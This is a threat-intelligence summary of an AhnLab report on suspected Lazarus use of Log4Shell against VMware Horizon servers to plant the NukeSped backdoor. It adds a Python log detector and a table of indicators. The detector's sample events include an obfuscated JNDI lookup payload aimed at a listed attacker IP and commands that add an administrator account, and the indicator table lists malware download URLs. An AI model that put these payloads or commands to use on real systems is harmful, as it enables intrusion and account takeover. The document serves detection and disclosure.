Lazarus group (NukeSped) exploiting the Log4Shell vulnerability

2022-05-12 AhnLab (ASEC) - Lazarus group (NukeSped) exploiting Log4Shell vulnerability

https://asec.ahnlab.com/ko/34107/


AhnLab observed suspected Lazarus activity exploiting CVE-2021-44228 (Log4Shell) in unpatched VMware Horizon servers used for remote work and cloud infrastructure operations in South Korea.

The intrusion deployed a NukeSped backdoor variant associated with Lazarus since around 2020. Traits of the sample: C++ class artifacts, internal strings protected with DES, C2 list and C2 traffic encrypted with RC4, and SSL-like handshake strings used to validate command-and-control servers. NukeSped supported operator commands including keylogging, screen capture, file and shell operations, port forwarding, and newly observed USB dump and webcam modules.

The attackers also installed credential and information stealers targeting browsers, email clients, and recently used Office/HWP files, then ran discovery and account-management commands such as ipconfig, query user, domain admin enumeration, and administrator-group modification that could support lateral movement.

Reported infrastructure included 185.29.8[.]18, 84.38.133[.]145, 84.38.133[.]16, and mail.usengineergroup[.]com. Separate logs showed earlier Log4Shell exploitation of the same environment by Jin Miner activity.
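The chain above (an obfuscated JNDI lookup against Horizon, a shell under the Log4j-bearing service, the discovery and admin-group commands, then beaconing to the listed infrastructure) is what a defender would want to surface from logs. The following is an added example, not AhnLab's code or anything from the NukeSped sample: it normalizes Log4j lookup obfuscation before matching for `${jndi:...}`, tracks the discovery/account-management command families the report names, and checks destinations against the report's network indicators. The `k=v|k=v` event format, the host names, the parent process name `ws_TomcatService.exe` (assumed for VMware Horizon) and the exact command switches are all constructed assumptions.

```python
"""Detection helpers for the Log4Shell-to-NukeSped chain described above.

Added example, not AhnLab's or the NukeSped authors' code. The event format,
log lines, host names, parent-process name and command switches are
constructed for illustration; the network indicators are the ones listed
in the report's IOC table.
"""
import re
from collections import defaultdict

# Network IOCs from the indicator table (iosk.org is the Jin Miner download host
# seen in the same environment's earlier Log4Shell logs).
IOC_NETWORK = {
    "185.29.8.18", "84.38.133.145", "84.38.133.16",
    "mail.usengineergroup.com", "iosk.org",
}

# Assumption: the Log4j-bearing VMware Horizon service runs under this image,
# so a child shell of it is the post-exploitation pivot worth alerting on.
HORIZON_PARENT = "ws_tomcatservice.exe"

# Command families named in the report. Exact switches are assumptions.
DISCOVERY = {
    "ipconfig": re.compile(r"\bipconfig\b", re.I),
    "query_user": re.compile(r"\bquery\s+user\b", re.I),
    "domain_admins": re.compile(r"\bnet\s+group\s+\"?domain admins\"?", re.I),
    "admin_group_mod": re.compile(r"\bnet\s+localgroup\s+administrators\b.*\s/add\b", re.I),
}

_INNER = re.compile(r"\$\{([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(?:ldaps?|rmi|dns|iiop|corba|nds|http)\s*:", re.I)


def normalize_lookups(s: str) -> str:
    """Resolve the innermost obfuscation lookups Log4j evaluates first:
    ${lower:j} -> j, ${upper:N} -> N, ${env:X:-d} and ${::-d} -> d.
    Repeats until stable, so nested payloads collapse to a plain ${jndi:...}."""
    def resolve(m):
        body = m.group(1)
        if ":-" in body:                       # default-value form
            return body.rsplit(":-", 1)[1]
        key, sep, val = body.partition(":")
        if sep and key.lower() in ("lower", "upper"):
            return val
        return m.group(0)                      # leave ${jndi:...} for the detector
    while True:
        new = _INNER.sub(resolve, s)
        if new == s:
            return s
        s = new


def is_log4shell_probe(request_field: str) -> bool:
    """True if a header/URI value would trigger a JNDI lookup on vulnerable Log4j."""
    return bool(_JNDI.search(normalize_lookups(request_field)))


def parse_event(line: str) -> dict:
    """Parse the constructed 'k=v|k=v' event format used in SAMPLE below."""
    return dict(kv.split("=", 1) for kv in line.split("|"))


def analyze(lines):
    """Return (host, finding) pairs for a batch of web, process and network events."""
    findings, seen = [], defaultdict(set)
    for line in lines:
        ev = parse_event(line)
        host = ev.get("host", "?")
        if ev.get("type") == "web" and is_log4shell_probe(ev.get("ua", "")):
            findings.append((host, "log4shell_probe"))
        if ev.get("type") == "proc":
            if ev.get("parent", "").lower() == HORIZON_PARENT:
                findings.append((host, "shell_from_horizon"))
            for name, rx in DISCOVERY.items():
                if rx.search(ev.get("cmd", "")):
                    seen[host].add(name)
        if ev.get("type") == "net" and ev.get("dst") in IOC_NETWORK:
            findings.append((host, "ioc_" + ev["dst"]))
    # Admin-group modification alone, or three distinct discovery families, is enough.
    for host, names in seen.items():
        if "admin_group_mod" in names or len(names) >= 3:
            findings.append((host, "lateral_movement_prep:" + ",".join(sorted(names))))
    return findings


SAMPLE = [  # constructed events, not taken from the report
    'type=web|host=horizon01|ua=${${lower:j}${::-n}di:${lower:ldap}://185.29.8.18:1389/a}',
    'type=proc|host=horizon01|parent=ws_TomcatService.exe|image=cmd.exe|cmd=cmd.exe /c ipconfig /all',
    'type=proc|host=horizon01|parent=cmd.exe|image=query.exe|cmd=query user',
    'type=proc|host=horizon01|parent=cmd.exe|image=net.exe|cmd=net group "domain admins" /domain',
    'type=proc|host=horizon01|parent=cmd.exe|image=net.exe|cmd=net localgroup administrators backup /add',
    'type=net|host=horizon01|dst=84.38.133.145|dport=443',
    'type=web|host=horizon02|ua=Mozilla/5.0 (Windows NT 10.0)',
]

if __name__ == "__main__":
    for host, finding in analyze(SAMPLE):
        print(host, finding)
```

The lookup normalizer matters more than the indicator list: the raw `${${lower:j}${::-n}di:...}` form never contains the literal `jndi`, which is exactly why signature matching on the unmodified header misses real probes. Date and other lookups are deliberately left unresolved; only the forms an attacker uses to hide the `jndi` keyword are collapsed.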

Indicators of Compromise

Type     Value                                  First Seen   Last Seen
-------  -------------------------------------  -----------  -----------
HASH     131fc4375971af391b459de33f81c253       2022-05-12   2023-02-10
HASH     830bc975a04ab0f62bfedf27f7aca673       2022-05-12   2023-02-10
HASH     85995257ac07ae5a6b4a86758a2283d7       2022-05-12   2023-02-10
HASH     87a6bda486554ab16c82bdfb12452e8b       2022-05-12   2023-02-10
HASH     827103a6b6185191fd5618b7e82da292       2022-05-12   2023-02-10
HASH     1875f6a68f70bee316c8a6eda9ebf8de       2022-04-28   2023-02-10
HASH     47791bf9e017e3001ddc68a7351ca2d6       2022-04-28   2023-02-10
IPv4     84.38.133.145                          2022-05-12   2022-09-08
HASH     c2412d00eb3b4bccae0d98e9be4d92bb       2022-05-12   2022-05-12
HASH     8c8a38f5af62986a45f2ab4f44a0b983       2022-05-12   2022-05-12
HASH     7ef97450e84211f9f35d45e1e6ae1481       2022-05-12   2022-05-12
HASH     dd4b8a2dc73a29bc7a598148eb8606bb       2022-05-12   2022-05-12
HASH     7a19c59c4373cadb4556f7e30ddd91ac       2022-05-12   2022-05-12
URL      http://iosk.org/pms/jin.zip            2022-05-12   2022-05-12
URL      http://iosk.org/pms/add.bat            2022-05-12   2022-05-12
URL      http://iosk.org/pms/mad.bat            2022-05-12   2022-05-12
URL      http://iosk.org/pms/jin-6.zip          2022-05-12   2022-05-12
DOMAIN   iosk.org                               2022-05-12   2022-05-12
IPv4     185.29.8.18                            2022-05-12   2022-05-12
IPv4     84.38.133.16                           2022-05-12   2022-05-12
DOMAIN   mail.usengineergroup.com               2022-04-28   2022-05-12
